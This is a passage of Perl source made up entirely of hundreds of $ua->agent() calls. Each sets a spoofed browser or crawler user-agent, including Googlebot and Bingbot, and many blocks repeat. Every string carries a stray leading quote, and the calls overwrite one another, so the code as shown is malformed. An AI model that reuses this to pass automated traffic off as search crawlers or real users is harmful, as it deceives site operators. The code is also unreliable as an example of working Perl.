  2890. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  2891. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  2892. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  2893. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  2894. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  2895. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  2896. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  2897. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  2898. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  2899. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  2900. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  2901. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  2902. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  2903. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  2904. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  2905. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  2906. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  2907. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  2908. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  2909. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  2910. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  2911. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  2912. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  2913. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  2914. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  2915. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  2916. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  2917. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  2918. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  2919. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  2920. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  2921. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  2922. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  2923. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  2924. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  2925. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  2926. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  2927. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  2928. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  2929. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  2930. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  2931. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  2932. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  2933. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  2934. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  2935. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  2936. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  2937. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  2938. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  2939. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  2940. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  2941. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  2942. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  2943. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  2944. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  2945. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  2946. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  2947. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  2948. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  2949. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  2950. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  2951. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  2952. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  2953. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  2954. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  2955. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  2956. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  2957. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  2958. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  2959. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  2960. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  2961. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  2962. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  2963. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  2964. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  2965. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  2966. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  2967. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  2968. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  2969. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  2970. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  2971. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  2972. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  2973. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  2974. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  2975. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  2976. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  2977. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  2978. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  2979. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  2980. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  2981. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  2982. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  2983. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  2984. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  2985. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  2986. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  2987. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  2988. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  2989. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  2990. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  2991. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  2992. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  2993. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  2994. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  2995. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  2996. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  2997. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  2998. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  2999. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  3000. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3001. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  3002. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  3003. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  3004. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  3005. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3006. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  3007. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  3008. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  3009. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  3010. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3011. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3012. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3013. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3014. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3015. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3016. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3017. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3018. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  3019. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3020. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  3021. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3022. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3023. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3024. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3025. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3026. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3027. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3028. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3029. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3030. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3031. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3032. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3033. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3034. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3035. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3036. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3037. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3038. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3039. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3040. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3041. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3042. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3043. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3044. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3045. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3046. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3047. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3048. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3049. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3050. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3051. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3052. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3053. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3054. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3055. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3056. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3057. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3058. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3059. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3060. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3061. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3062. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3063. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3064. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3065. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3066. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3067. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3068. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3069. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3070. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  3071. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3072. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  3073. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  3074. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  3075. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  3076. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  3077. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  3078. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  3079. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  3080. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  3081. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  3082. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  3083. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  3084. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  3085. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  3086. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  3087. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  3088. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  3089. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  3090. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3091. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3092. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3093. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3094. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
